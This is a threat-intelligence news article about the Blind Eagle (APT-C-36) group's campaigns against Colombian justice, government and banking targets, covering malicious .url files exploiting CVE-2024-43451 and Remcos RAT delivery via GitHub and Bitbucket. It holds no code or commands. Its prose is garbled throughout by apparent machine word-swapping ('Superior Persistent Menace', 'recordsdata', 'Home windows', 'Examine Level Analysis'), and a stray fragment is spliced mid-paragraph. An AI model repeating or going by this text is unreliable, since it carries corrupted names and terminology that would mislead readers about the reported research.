In a big growth within the cybersecurity panorama, APT-C-36, extra generally referred to as Blind Eagle, has intensified its operations concentrating on Colombian governmental, monetary, and demanding infrastructure organizations.
Energetic since 2018, this Superior Persistent Menace group has not too long ago expanded its arsenal with subtle exploit methods and malware, demonstrating an alarming capacity to adapt to evolving safety measures.
The risk actor has contaminated greater than 1,600 victims in a single marketing campaign, highlighting the dimensions and effectiveness of their operations.
Blind Eagle has demonstrated outstanding agility in incorporating new exploits into its assault strategies.
On November 12, 2024, Microsoft patched a newly found vulnerability, CVE-2024-43451, which was being actively exploited within the wild utilizing malicious .url recordsdata.
Inside simply six days of the patch launch, Blind Eagle had already built-in a variant of this exploit into its assault arsenal.
This variant differs from the unique exploit in that it doesn’t expose the NTLMv2 hash however as a substitute serves as a notification mechanism for the risk actors when a focused consumer downloads the malicious file.
The group’s capacity to quickly adapt to newly disclosed vulnerabilities underscores their technical sophistication and chronic risk capabilities.
The malicious .url recordsdata are notably efficient as a result of they’ll set off WebDAV requests on unpatched machines via uncommon consumer interactions reminiscent of right-clicking, deleting, or dragging the file.
Even on patched techniques, these recordsdata can nonetheless result in malware an infection if a consumer manually clicks on them.
Regardless of being in use for over two months, many of those .url recordsdata stay undetected by antivirus engines on VirusTotal, permitting Blind Eagle to keep up stealth of their operations.
The group’s techniques now embody leveraging reputable file-sharing platforms like Google Drive, Dropbox, GitHub, and Bitbucket to distribute their malware, additional complicating detection efforts by safety instruments.
Marketing campaign Infrastructure and Refined Malware Chain
Between December 2024 and February 2025, Blind Eagle carried out a number of campaigns recognized by inner codenames reminiscent of “socialismo,” “miami,” “PARAISO,” “marte,” and “saturno”.
These campaigns utilized a constant assault chain: malicious .url recordsdata delivered through e mail (usually via compromised Google Drive accounts) would obtain a HeartCrypt-packed malware.
This malware would then extract and inject a packed .NET loader into reputable Home windows processes like csc.exe, finally delivering a .NET Distant Entry Trojan (RAT) that seems to be a variant of PureCrypter1.
The technical sophistication continues all through the assault chain. The .NET RAT collects detailed details about the sufferer’s system, together with username, working system model, put in antivirus, and machine specs.
This knowledge is then encrypted utilizing AES and despatched to command and management (C&C) servers with domains that steadily change however usually resolve to the identical IP addresses.
In response, the C&C server gives a URL for downloading the ultimate payload – sometimes Remcos RAT – which is hosted on GitHub or BitBucket repositories maintained by the attackers.
Evaluation of the GitHub repository “Oscarito20222/file” revealed that every one repository updates have been dedicated within the UTC-5 timezone, doubtlessly indicating Blind Eagle’s origin in South American nations.
This repository could be usually up to date with new malicious executables, then deleted after use, demonstrating the group’s operational safety consciousness.
Notably, on February 25, 2025, the group by chance uploaded an HTML file containing personally identifiable info (PII) from earlier phishing actions, revealing their concentrating on of Colombian financial institution prospects and confirming the give attention to Colombian victims.
Extreme Affect on Colombian Public and Non-public Sectors
The influence of Blind Eagle’s campaigns has been substantial, notably on Colombian governmental organizations.
Primarily based on filenames of malicious .url recordsdata, the group has been particularly concentrating on numerous Colombian justice system entities, together with courts dealing with felony circumstances, labor disputes, and safety measures.
The malicious filenames mimic official authorized communications, reminiscent of notifications of hearings, judicial complaints, and protecting orders, exploiting the belief in governmental communications to extend the probability of sufferer interplay.
Within the December 2024 “PARAISO” marketing campaign alone, greater than 1,600 Colombian techniques have been contaminated with Remcos RAT.
facturacioncol/truth Bitbucket repository.Contemplating the focused nature of APT teams like Blind Eagle, this an infection price is especially vital and demonstrates their effectiveness.
The full infections throughout campaigns occurring over only one week in December approximated 9,000, revealing the in depth attain of their operations.
An information leak from the group’s operations uncovered over 8,400 entries of personally identifiable info collected via phishing campaigns impersonating Colombian banks.
From the 1,634 recognized e mail addresses, 5 belonged to Colombian authorities companies, together with the nationwide police, tax authority, and comptroller’s workplace.
This means Blind Eagle’s persistent concentrating on of governmental entities alongside monetary establishments and personal residents, making a complete risk to Colombia’s nationwide safety and financial stability.
Examine Level Analysis, which has been monitoring Blind Eagle’s actions, notes that the group stays one of the vital lively and harmful risk actors in Latin America.
Their speedy evolution, efficient social engineering techniques, and give attention to each private and non-private sector entities require organizations to implement proactive risk intelligence, superior safety defenses, and steady monitoring to mitigate the danger posed by this adaptable adversary.
Are you from SOC/DFIR Groups?: Analyse Malware Incidents & get dwell Entry with ANY.RUN -> Begin Now for Free.